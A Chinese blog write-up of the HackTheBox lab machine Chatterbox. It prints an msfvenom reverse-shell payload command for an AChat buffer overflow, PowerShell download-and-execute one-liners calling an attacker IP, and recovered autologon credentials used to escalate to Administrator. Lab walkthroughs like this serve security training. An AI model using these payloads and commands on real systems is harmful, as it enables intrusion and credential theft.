HackTheBox-windows-Chatterbox

  • A+
所属分类:安全文章

大余安全  

一个每日分享渗透小技巧的公众号HackTheBox-windows-Chatterbox



大家好,这里是 大余安全 的第 65 篇文章,本公众号会每日分享攻防渗透技术给大家。


HackTheBox-windows-Chatterbox
HackTheBox-windows-Chatterbox

靶机地址:https://www.hackthebox.eu/home/machines/profile/123

靶机难度:中级(4.0/10)

靶机发布日期:2018年6月16日

靶机描述:

Chatterbox is a fairly straightforward machine that requires basic exploit modification or Metasploit troubleshooting skills to complete.


请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

HackTheBox-windows-Chatterbox
HackTheBox-windows-Chatterbox
HackTheBox-windows-Chatterbox



HackTheBox-windows-Chatterbox

一、信息收集

HackTheBox-windows-Chatterbox


HackTheBox-windows-Chatterbox可以看到靶机的IP是10.10.10.74.....

HackTheBox-windows-Chatterbox

nmap发现运行了9255http的服务...还发现存在缓冲区溢出漏洞...

HackTheBox-windows-Chatterbox

无法访问...400,回头发现运行了Achat服务器上...

HackTheBox-windows-Chatterbox

存在漏洞,有个python能利用...试试

HackTheBox-windows-Chatterbox

修改地址后...

HackTheBox-windows-Chatterbox

可以看到这是建立在windows系统上的缓冲区溢出...这里可以利用powershell方向链接靶机...GO

HackTheBox-windows-Chatterbox

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.18 LPORT=6666 -e x86/unicode_mixed -b 'x00x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferRegister=EAX -f python

利用achat漏洞创建windows上powershell的反向shell...但是问题来了,可以看到16974 bytes,Payload 3556,大于1100个字节就不能使用有效负荷了...继续修改...

HackTheBox-windows-Chatterbox

生成MSFbuf...

HackTheBox-windows-Chatterbox

准备好上传的shell...

HackTheBox-windows-Chatterbox

将shell填入即可....

HackTheBox-windows-Chatterbox

验证正常的...go

HackTheBox-windows-Chatterbox

通过powershell反向shell成功上传了...获得了低权...

HackTheBox-windows-Chatterbox

获得user.txt...

HackTheBox-windows-Chatterbox

HackTheBox-windows-Chatterbox

这里有点取巧了,目前我还在低权Alfred用户下,发现administrator下desktop的权限是可以看到root.txt文件的...但是我进去查看内容无法查看...看到我和system高权用户权限是一样的...

HackTheBox-windows-Chatterbox

可以看到,这里直接在低权用户利用icacls获得了root信息...这是人员管理用户给权限的漏洞... (cacls  Windows实用程序,用于查看/编辑文件权限)

虽然拿到了信息...但是还是要讲述怎么拿到system权限的...继续

目前具有PowerShell会话,可以使用PowerUp进行提权...

HackTheBox-windows-Chatterbox

git cloun https://github.com/PowerShellMafia/PowerSploit

下载后上传使用即可...

HackTheBox-windows-Chatterbox

IEX(NEW-Object Net.webClient).downloadString('http://10.10.14.18/dayu.ps1')

因为在powershell下,直接上传...

HackTheBox-windows-Chatterbox

Invoke-AllChecks

可以看到利用PowerUp看到了隐藏在注册表中的一组自动登录凭据...

DefaultUserName      : AlfredDefaultPassword      : Welcome1!

HackTheBox-windows-Chatterbox

这里创建一个凭据变量来存储密码...就是告诉PowerShell将先前找到的密码存储在纯文本中,并强制将其保存...

然后创建一个名为cred的新变量,并将其用于登录...

HackTheBox-windows-Chatterbox

直接在利用提权的shell即可...

HackTheBox-windows-Chatterbox

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/dayushell.ps1')"  -Credential $cred

可以看到成功获得了administrator用户权限...

HackTheBox-windows-Chatterbox

通过尝试使用Administrator帐户重用此密码是成功的,使用powershell或打开SMB并使用impacket的psexec来实现了...完美

这里也能成功获得了root信息...


HackTheBox-windows-Chatterbox

这里介绍了几种方法,大家多多操作,加油!


当然,开局的时候官方的给的方法是:Chatterbox是一台非常简单的机器,需要基本的漏洞利用修改或Metasploit故障排除技能才能完成。


我这里没使用Metasploit进行渗透的...说明Metasploit肯定还有方式方法能进行提权.. 


这里有专研精神的,可以继续专研下去,这里可以利用Metasploit获得root信息...GO


由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

HackTheBox-windows-Chatterbox


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-windows-Chatterbox
HackTheBox-windows-Chatterbox


HackTheBox-windows-Chatterbox


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-windows-Chatterbox

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-windows-Chatterbox


本文始发于微信公众号(大余安全):HackTheBox-windows-Chatterbox

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: